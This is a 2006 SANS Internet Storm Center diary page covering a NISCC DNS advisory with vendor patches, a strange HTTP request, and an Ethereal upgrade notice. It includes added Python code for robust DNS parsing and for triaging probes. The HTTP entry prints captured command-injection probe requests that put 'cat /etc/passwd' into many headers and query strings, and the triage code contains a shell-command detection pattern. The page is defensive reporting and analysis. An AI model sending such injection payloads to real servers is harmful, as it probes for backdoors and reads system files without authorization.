SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2006-04-25



DNS vulnerability announced by NISCC today

Published: 2006-04-25
Last Updated: 2006-04-25 23:45:13 UTC
by Donald Smith (Version: 1)
NISCC has published an advisory about a potential DNS vulnerability today: http://www.niscc.gov.uk/niscc/docs/br-20060425-00311.html

These issues were discovered using the Oulu University Secure Programming Group's new PROTOS test suite c09-dns. This tool is not currently public.

Their abstract states:
"Abstract: The vulnerabilities described in this advisory affect implementations of the Domain Name System (DNS) protocol. Many vendors include support for this protocol in their products and may be impacted to varying degrees, if at all."

Notice that they say "affect implementations", which implies that this is not a vulnerability in the DNS protocol itself but rather an issue in how some vendors implemented that protocol.
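The distinction matters in practice: a fuzzer such as PROTOS exercises exactly the implementation, by feeding deliberately malformed packets and watching which parsers crash, hang or loop. As an added example (not from the diary, the NISCC advisory, or any of the vendors named on this page), the following Python code is a deliberately defensive DNS question-section parser. The sample messages are constructed here: the labels, offsets and the 0x1234 transaction id are my own choices, not data from the advisory. It shows the three malformed shapes a robust implementation must survive: a name that runs past the end of the message, a compression pointer that loops back to itself, and a header shorter than 12 octets.

```python
import struct

MAX_NAME_OCTETS = 255   # RFC 1035 section 2.3.4: a name is at most 255 octets on the wire
MAX_POINTER_HOPS = 32   # belt and braces on top of the backwards-only pointer rule


class MalformedMessage(ValueError):
    """Raised instead of letting a bad packet crash or hang the parser."""


def read_name(msg: bytes, offset: int):
    """Decode a possibly-compressed name starting at offset.

    Returns (name, offset_after_name). Every read is bounds-checked and a
    compression pointer must point strictly backwards, so a looping or
    truncated name raises MalformedMessage instead of spinning forever.
    """
    labels = []
    pos = offset
    end = None        # offset just past the name in the original (unjumped) stream
    hops = 0
    octets = 0
    while True:
        if pos >= len(msg):
            raise MalformedMessage("name runs past end of message")
        length = msg[pos]
        if length & 0xC0 == 0xC0:                 # compression pointer (two octets)
            if pos + 1 >= len(msg):
                raise MalformedMessage("truncated compression pointer")
            target = ((length & 0x3F) << 8) | msg[pos + 1]
            if target >= pos:                     # forward or self pointer: the classic loop
                raise MalformedMessage("compression pointer does not point backwards")
            hops += 1
            if hops > MAX_POINTER_HOPS:
                raise MalformedMessage("too many compression pointer hops")
            if end is None:
                end = pos + 2
            pos = target
            continue
        if length & 0xC0:                         # 0x40 / 0x80 are reserved label types
            raise MalformedMessage("unsupported label type")
        if length == 0:                           # root label terminates the name
            if end is None:
                end = pos + 1
            return ".".join(labels) or ".", end
        octets += length + 1
        if octets + 1 > MAX_NAME_OCTETS:
            raise MalformedMessage("name longer than 255 octets")
        if pos + 1 + length > len(msg):
            raise MalformedMessage("label runs past end of message")
        labels.append(msg[pos + 1:pos + 1 + length].decode("latin-1"))
        pos += 1 + length


def parse_questions(msg: bytes):
    """Parse the 12-octet header and the question section; return [(name, qtype, qclass), ...]."""
    if len(msg) < 12:
        raise MalformedMessage("header shorter than 12 octets")
    _ident, _flags, qdcount, _ancount, _nscount, _arcount = struct.unpack("!6H", msg[:12])
    pos = 12
    questions = []
    for _ in range(qdcount):                      # a huge qdcount just fails fast at the first bad read
        name, pos = read_name(msg, pos)
        if pos + 4 > len(msg):
            raise MalformedMessage("question fields run past end of message")
        qtype, qclass = struct.unpack("!HH", msg[pos:pos + 4])
        questions.append((name, qtype, qclass))
        pos += 4
    return questions


def check_message(msg: bytes):
    """Return ("ok", questions) or ("malformed", reason). Never raises, never hangs."""
    try:
        return "ok", parse_questions(msg)
    except MalformedMessage as exc:
        return "malformed", str(exc)


# Constructed sample messages (not from the advisory).
HEADER = b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"   # id 0x1234, RD set, qdcount 1
QNAME = b"\x03www\x07example\x03com\x00"
GOOD = HEADER + QNAME + b"\x00\x01\x00\x01"         # www.example.com A IN
COMPRESSED = GOOD + b"\xc0\x0c"                     # a second name: pointer back to offset 12
LOOP = HEADER + b"\xc0\x0c"                         # name at offset 12 is a pointer to offset 12
TRUNCATED = HEADER + b"\x03ww"                      # label claims 3 octets, only 2 present

if __name__ == "__main__":
    for label, sample in [("good", GOOD), ("loop", LOOP), ("truncated", TRUNCATED)]:
        print(label, check_message(sample))
    print("compressed second name:", read_name(COMPRESSED, 33))
```

The backwards-only rule on pointers is what makes the decoder terminate: each hop strictly decreases the offset, so no sequence of pointers can cycle, and the hop cap only guards against a pathological chain of many legitimate backwards pointers.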

The following link lists the vendors who have responded with vulnerability information so far: http://www.niscc.gov.uk/niscc/docs/re-20060425-00312.pdf?lang=en

Not many vendors provided vulnerability details on their products.

The Internet Software Consortium (http://isc.org/), authors of BIND, provided a detailed response. Juniper Networks (http://www.juniper.net/), Delegate (http://www.delegate.org/) and pdnsd (http://www.phys.uu.ne/~rombouts/) also provided specific details. In each case the impact appears to be a denial of service, not remote code execution.

Hitachi and Wind River state that they believe they are not vulnerable.

Microsoft, Sun and Ethereal all reported that they are reviewing or testing for these issues.


PATCHES
ISC (BIND), MyDNS, Juniper Networks, pdnsd all announced vulnerabilities.
All but ISC have released patches or upgrades for them.


ISC has not released a patch, but based on their analysis their vulnerability is a very low risk. It appears to be triggered by a malformed second TSIG packet. If you understand TSIG you understand why this should not be much of a threat, as the two parties have already established a trust relationship by the time that packet is processed.

The pdnsd maintainer, Paul A. Rombouts, recommends upgrading to version 1.2.4 or later of pdnsd: http://www.phys.uu.nl/~rombouts/pdnsd.html

MyDNS 1.1.0 has a fix for a "query-of-death" DoS and can be found here: http://mydns.bboy.net

Juniper Networks has several upgrade options for their E-series routers, which are the only routers mentioned as having a vulnerability. You may need a Juniper Networks account to get access to those updates. According to the vendor document above: "The issue was resolved in the following JUNOSe updates: 5-3-5p0-2, 6-0-3p0-6, 6-0-4, 6-1-3p0-1, 7-0-1p0-7, 7-0-2, 7-1-0p0-1, 7-1-1. Later JUNOSe releases are unaffected."


Strange HTTP request...

Published: 2006-04-25
Last Updated: 2006-04-25 20:22:16 UTC
by Pedro Bueno (Version: 1)
UPDATE:

We received a nice tip about this one from Koivunen Toni, of CERT-FI...
Solution:
---> Looks like it is a scan for backdoored pr0n websites...

Below is another sample:

http://aaaaaaaaa.com/autorank/control.php
Accept-H33p3r:<<unix-command>>
http://bbbbbbbbb.com/images/nav.php
Accept-H33p3r:<<unix-command>>
http://xxxxxxxxx.com/cgi-bin/archives/00000155_.cgi
Accept-Ip:<<unix-command>>
http://yyyyyyyyy.net/cgi-bin/system.pl
Xa=Xa;g=<<unix-command>>;exit
http://wwwwwwwww.com/cgi-bin/pennywize/penny.cgi
Accept-Ip:<<unix-command>>
http://zzzzzzzzz.com/cgi-bin/tgsw/de/teens/control.cgi
Xa=Xa;g=<<unix-command>>;exit
http://ttttttttt.com/abicons/apache/small/icon.php
Accept-H33p3r:<<unix-command>>

-----------------------------------------------------------
Today we got an interesting email reporting a strange HTTP request:

--------------------------------------------------------------------------------
POST /thumbs/index.php HTTP/1.1
Host: example.com

Connection: keep-alive
Content-Length: 0
Cookie: cat /etc/passwd
Referer: http://example.com/thumbs/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Pragma: no-cache
Cache-Control: no-cache
accept_language: cat /etc/passwd
accept_ip: cat /etc/passwd
ip: cat /etc/passwd
accept_whynot: cat /etc/passwd
accept_phpinfo: cat /etc/passwd
accept_redlight: cat /etc/passwd
accept_ASE: cat /etc/passwd
accept_X: cat /etc/passwd
USER_X87NEK: cat /etc/passwd
ACCEPT_HHT: cat /etc/passwd
Accept_MUZZ: cat /etc/passwd
Accept_MusicIsTheKey: cat /etc/passwd
Accept_encoding: cat /etc/passwd
Accept_MS: cat /etc/passwd
ACCEPT_SHREK: cat /etc/passwd
ACCEPT_s1yntr1o: cat /etc/passwd
ACCEPT_shockfx: cat /etc/passwd
ACCEPT_COOLHK: cat /etc/passwd
ACCEPT_l0ve: cat /etc/passwd
Morgoth: cat /etc/passwd
ACCEPT_ShAd0w: cat /etc/passwd
ACCEPT_bk4712: cat /etc/passwd
Accept_BBBS: cat /etc/passwd
ACCEPT_Resys: cat /etc/passwd
ACCEPT_XPW: cat /etc/passwd
BC: cat /etc/passwd
ZION: cat /etc/passwd
cmd: cat /etc/passwd
ACCEPT_netsploiter: cat /etc/passwd
ACCEPT_jayman: cat /etc/passwd
ACCEPT_Joschi: cat /etc/passwd
ACCEPT_MechW: cat /etc/passwd
ACCEPT_slickrick: cat /etc/passwd
ACCEPT_Banana: cat /etc/passwd
ACCEPT_H33p3r: cat /etc/passwd
ACCEPT_KaIzeR: cat /etc/passwd
ACCEPT_Joschi: cat /etc/passwd
Content-type: application/x-www-form-urlencoded
-----------------------------------------------------------------------

While this is a 'strange' HTTP request, we believe that nothing in the 'cat /etc/passwd' part would actually be executed on the web server side...
So, our request is: have you ever seen this before?
---------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)
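What the two samples above have in common is that the command is carried in places a normal client never uses: made-up header names (often with underscores, which a CGI gateway would expose to a script as HTTP_<NAME> environment variables), standard headers such as Cookie whose value is a shell command, and query strings of the form Xa=Xa;g=...;exit. As an added example, not from the diary or from CERT-FI, here is a small Python triage script for captured requests of this kind. The two sample requests are constructed here from the shapes shown in the diary; the header allow-list and the list of command words are my own assumptions and are deliberately short.

```python
import re
from urllib.parse import unquote

# Header names an ordinary browser or proxy sends (constructed allow-list, not exhaustive).
KNOWN_HEADERS = {
    "host", "connection", "content-length", "content-type", "cookie", "referer",
    "user-agent", "pragma", "cache-control", "accept", "accept-language",
    "accept-encoding", "accept-charset", "keep-alive", "x-forwarded-for",
}

# Shell-like content: a sensitive path, a shell binary path, command substitution,
# or a command word at the start of the value or right after a ; | & separator.
# The command word must be followed by whitespace or end of value, so a cookie like
# "sessionid=1;id=5" or a User-Agent such as "(compatible; MSIE 6.0)" is not flagged.
SHELL_VALUE = re.compile(
    r"/etc/passwd|/bin/|`|\$\(|(?:^|[;|&])\s*(?:cat|id|uname|wget|curl|ls|perl|sh|exit)(?=\s|$)"
)


def parse_request(raw: str):
    """Split a captured request into (request_line, [(name, value), ...]).

    Accepts bare LF or CRLF. Lines without a colon (the stray blank line after
    Host: in the diary sample, or body fragments) are skipped rather than
    treated as the end of the header block, since this is triage of a capture,
    not an HTTP server.
    """
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    request_line = lines[0].strip()
    headers = []
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return request_line, headers


def suspicious_headers(headers):
    """Return (name, value, reason) for each header whose value looks like a command."""
    findings = []
    for name, value in headers:
        if not SHELL_VALUE.search(value):
            continue
        reason = "shell-like value"
        if name.lower() not in KNOWN_HEADERS:
            reason += "; non-standard header name"
        if "_" in name:
            reason += " (underscore: a CGI gateway exposes it as HTTP_<NAME>)"
        findings.append((name, value, reason))
    return findings


def suspicious_query(request_line: str):
    """Return (param, value) pairs in the query string that carry a shell-like value."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    _path, _, query = parts[1].partition("?")
    findings = []
    for pair in query.split("&"):          # split on & only; a ; inside a value is what we look for
        if not pair:
            continue
        key, _, value = pair.partition("=")
        value = unquote(value)
        if SHELL_VALUE.search(value):
            findings.append((key, value))
    return findings


def assess(raw: str):
    """Triage one captured request; returns a dict with a verdict and the evidence."""
    request_line, headers = parse_request(raw)
    header_hits = suspicious_headers(headers)
    query_hits = suspicious_query(request_line)
    verdict = "command-injection probe" if header_hits or query_hits else "benign"
    return {"request_line": request_line, "headers": header_hits,
            "query": query_hits, "verdict": verdict}


# Constructed samples modelled on the diary: a trimmed version of the reported request,
# the query-string form from the second list, and an ordinary browser request.
SCAN_REQUEST = """POST /thumbs/index.php HTTP/1.1
Host: example.com

Connection: keep-alive
Content-Length: 0
Cookie: cat /etc/passwd
Referer: http://example.com/thumbs/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
accept_language: cat /etc/passwd
accept_ip: cat /etc/passwd
cmd: cat /etc/passwd
Content-type: application/x-www-form-urlencoded
"""

QUERY_REQUEST = """GET /cgi-bin/system.pl?Xa=Xa;g=<<unix-command>>;exit HTTP/1.1
Host: example.net
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
"""

BENIGN_REQUEST = """GET /thumbs/index.php?page=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept-Language: en-US,en;q=0.5
Cookie: sessionid=abc123; theme=dark
"""

if __name__ == "__main__":
    for sample in (SCAN_REQUEST, QUERY_REQUEST, BENIGN_REQUEST):
        result = assess(sample)
        print(result["verdict"], "|", result["request_line"])
        for name, value, reason in result["headers"]:
            print("   header", name, "=", value, "->", reason)
        for key, value in result["query"]:
            print("   query ", key, "=", value)
```

The value check is intentionally narrow: semicolons alone are normal in User-Agent, Cookie and Accept-Language, so the pattern only fires when a separator is followed by a command word, or when the value names /etc/passwd, a /bin/ path or command substitution. The header-name check is secondary evidence, since legitimate X- headers are common; it is reported alongside a suspicious value, not on its own.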



Time to upgrade Ethereal...

Published: 2006-04-25
Last Updated: 2006-04-25 16:43:55 UTC
by Pedro Bueno (Version: 1)

Yes, if you use Ethereal, it is time to upgrade. According to an advisory posted by FrSIRT, 28 vulnerabilities have been identified in Ethereal "which could be exploited by remote attackers to compromise a vulnerable system or cause a denial of service."
Ethereal has released a new version, 0.99, to fix them, which you can find here.

Versions that were confirmed to be vulnerable are: Ethereal 0.8.5 through 0.10.14

You can find the signatures file here.

-------------------------------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)